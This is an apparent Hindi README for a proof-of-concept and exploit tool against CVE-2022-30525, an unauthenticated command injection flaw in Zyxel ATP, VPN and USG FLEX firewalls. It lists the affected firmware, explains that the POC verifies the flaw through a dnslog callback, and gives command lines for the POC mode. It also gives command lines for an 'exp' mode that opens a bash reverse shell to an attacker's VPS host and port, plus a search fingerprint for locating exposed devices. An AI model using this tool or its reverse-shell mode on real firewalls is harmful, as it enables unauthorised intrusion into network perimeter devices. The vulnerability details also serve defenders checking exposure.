
CVE-2022-30525 Zyxel फ़ायरवॉल कमांड इंजेक्शन भेद्यता POC&EXPC
CVE-2022-30525 POC&EXP
author:160team.west9B
केवल अधिकृत स्थितियों में सुरक्षा शोधकर्ताओं द्वारा उपयोग के लिए। साइबर सुरक्षा कानून का पालन करें। किसी भी समस्या के परिणाम स्वयं वहन करें, लेखक जिम्मेदार नहीं है।
12 मई 2022 को, Zyxel ने अपने फ़ायरवॉल उपकरणों में बिना प्रमाणीकरण वाली रिमोट कमांड इंजेक्शन भेद्यता (CVE-2022-30525) को ठीक करने के लिए एक सुरक्षा बुलेटिन जारी किया, जिसका CVSS स्कोर 9.8 है। यह भेद्यता कुछ Zyxel फ़ायरवॉल संस्करणों के CGI प्रोग्राम में मौजूद है, जो बिना प्रमाणीकरण के प्रभावित उपकरणों पर मनमाना कमांड निष्पादित करने की अनुमति देती है।
प्रभावित सीमा:
ATP श्रृंखला फर्मवेयर: 5.10-5.21 Patch 1
VPN श्रृंखला फर्मवेयर: 4.60-5.21 Patch 1
USG FLEX 100(W), 200, 500, 700: 5.00-5.21 Patch 1
USG FLEX 50(W)/USG20(W)-VPN: 5.10-5.21 Patch 1
इस भेद्यता के कमांड निष्पादन में कोई आउटपुट (ईको) नहीं होता है, इसलिए POC सत्यापन dnslog API का अनुरोध करता है; यदि dnslog पर अनुरोध आता है, तो भेद्यता मौजूद है। नेटवर्क विलंब के कारण गलत सकारात्मक परिणाम से बचने के लिए, DNSLOG सत्यापन अनुरोध 10 सेकंड विलंबित होता है।
usage_poc: ./cve-2022-30525 -m poc -u https://192.168.1.1/
exp bash रिवर्स शेल है; -m exp के बाद VPS IP तथा पोर्ट निर्दिष्ट करें।
**usage_exp:./cve-2022-30525 -m exp -u https://192.168.1.1/ -lhost 192.168.1.2 -lport 1337 **

title="USG FLEX xx"